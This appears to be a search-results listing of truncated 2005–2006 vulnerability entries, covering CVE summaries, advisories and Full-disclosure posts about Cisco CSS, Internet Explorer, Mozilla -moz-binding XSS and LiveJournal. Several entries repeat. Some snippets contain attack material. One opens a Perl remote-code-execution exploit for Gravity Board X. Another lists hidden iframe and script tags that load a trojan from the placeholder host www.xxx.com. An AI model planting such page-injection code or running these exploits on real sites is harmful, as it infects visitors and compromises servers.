CVE-2006-1631

The CVE-2006-1631 entry refers to a vulnerability in Cisco 11500 Series Content Services switches where the HTTP compression feature can be abused to trigger a denial-of-service (device reload) by sending certain HTTP requests (either valid but obsolete or specially crafted). Exploitation details...

CVE-2006-1631

Unspecified vulnerability in the HTTP compression functionality in Cisco CSS 11500 Series Content Services switches allows remote attackers to cause a denial of service device reload via 1 "valid, but obsolete" or 2 "specially crafted" HTTP requests...

IPB v1.x upload html .gif

/ ,, / / '-./.-' .--' '--. / / /"" SpiderZ ForumZ Security | | | | / / '..' = Autore: SpiderZ = IPB v1.x upload html .gif = Sito: www.spiderz.tk 1° Registrati al seguente forum 2° entra con i tuoi dati 3° vai su "My Controls" adesso entra su "Edit Avatar Settings" 4° prepara la tua pagina "exploi...

Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities

source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. These issues...

Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl Gravity Board X v1.1 possibly prior versions remote code execution exploit coded by 1dt.w0lf 14.08.2005 RST/GHC http://rst.void.ru http://ghc.ru use LWP::UserAgent; if@ARGV1 exit0; $path = $ARGV0; header; print "Creating shell... Please wait\n"; $...

CVE-2005-4717

Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service client crash via a certain combination of a malformed HTML file and a CSS file that triggers a null dereferenc...

[NT] Microsoft Internet Explorer Drag-and-Drop Redeux

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

CVE-2006-0496

Cross-site scripting XSS vulnerability in Mozilla 1.7.12 and possibly earlier, Mozilla Firefox 1.0.7 and possibly earlier, and Netscape 8.1 and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the -moz-binding Cascading Style Sheets CSS property, which does not...

Cross site scripting

Cross-site scripting XSS vulnerability in Mozilla 1.7.12 and possibly earlier, Mozilla Firefox 1.0.7 and possibly earlier, and Netscape 8.1 and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the -moz-binding Cascading Style Sheets CSS property, which does not...

CVE-2006-0496

Cross-site scripting XSS vulnerability in Mozilla 1.7.12 and possibly earlier, Mozilla Firefox 1.0.7 and possibly earlier, and Netscape 8.1 and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the -moz-binding Cascading Style Sheets CSS property, which does not...

CVE-2006-0496

CVE-2006-0496 is an XSS in Mozilla-based browsers (Mozilla 1.7.12+, Firefox 1.0.7+, Netscape 8.x) due to a flaw in the -moz-binding CSS property that can bypass origin checks. Exploitation could allow execution of arbitrary script in a user’s browser, evidenced by the LiveJournal account compromi...

CVE-2006-0496

Cross-site scripting XSS vulnerability in Mozilla 1.7.12 and possibly earlier, Mozilla Firefox 1.0.7 and possibly earlier, and Netscape 8.1 and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the -moz-binding Cascading Style Sheets CSS property, which does not...

[Full-disclosure] -moz-binding CSS property: more XSS fun

Hm, I haven't seen this posted here ... Firefox now supports the -moz-binding CSS property, which associate XBL1 with an element. The same origin policy is not applied. This is a problem because XBL may contain JavaScript and it runs with full access to content. There is a bug report2 filed, but ...

Mozilla CSS crossite scripting

-moz-binding: CSS allows to bind XBL with element and XBL may contains scripts. It may lead to crossite sripting within e.g. webmail...

simpleBlogXSS.txt

Hackers Center Security Group http://www.hackerscenter.com/ Zinho's Security Advisory Risk: High - Note from the author Simple Blog is a free weblog application intended for personal use. The latest version, 2.1, features xhtml/css template structure, rss feed, blog calendar and an easy to use...

CVE-2005-4717

Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service client crash via a certain combination of a malformed HTML file and a CSS file that triggers a null dereferenc...

hcXSS.txt

In GOD We Trust Kachal667 Under9round Team KuT Hi, Here's myLrK new advisory about Hosting Controller. Hosting Controller - CSS vulnerabilities Found date : Pri8 Public Date: 02/11/2005 Summary ------- Hosting Controller is an all-in-one administrative hosting tool for Windows. It automates a wid...

Hang the page of the horse a couple of methods-vulnerability warning-the black bar safety net

One, the most simple are also the most effective iframe src=http://www.xxx.com/muma.html width=0 height=0/iframe Second, js hang horse script src=http://www. xxx. com/muma. js/script Third, the js modification encryption SCRIPT language="JScript. Encode" src=http://www. xxx. com/muma. txt/script...

CVE-2005-4454

Validate-before-filter vulnerability in cleanhtml.pl 1.129 in LiveJournal CVS before Dec 7 2005, when the cleancss option is enabled, allows remote attackers to conduct cross-site scripting XSS attacks via a "" backslash within a "javascript" scheme in a style property such as "javas\cript", whic...

[Full-disclosure] LiveJournal CSS/JS injection vulnerability

SUMMARY ---------------------------------------------------------------------- The popular Livejournal1 social networking software contained an error which allowed for the inclusion of Javascript in user-supplied content. 1 http://www.livejournal.org/, http://www.livejournal.com/ BACKGROUND...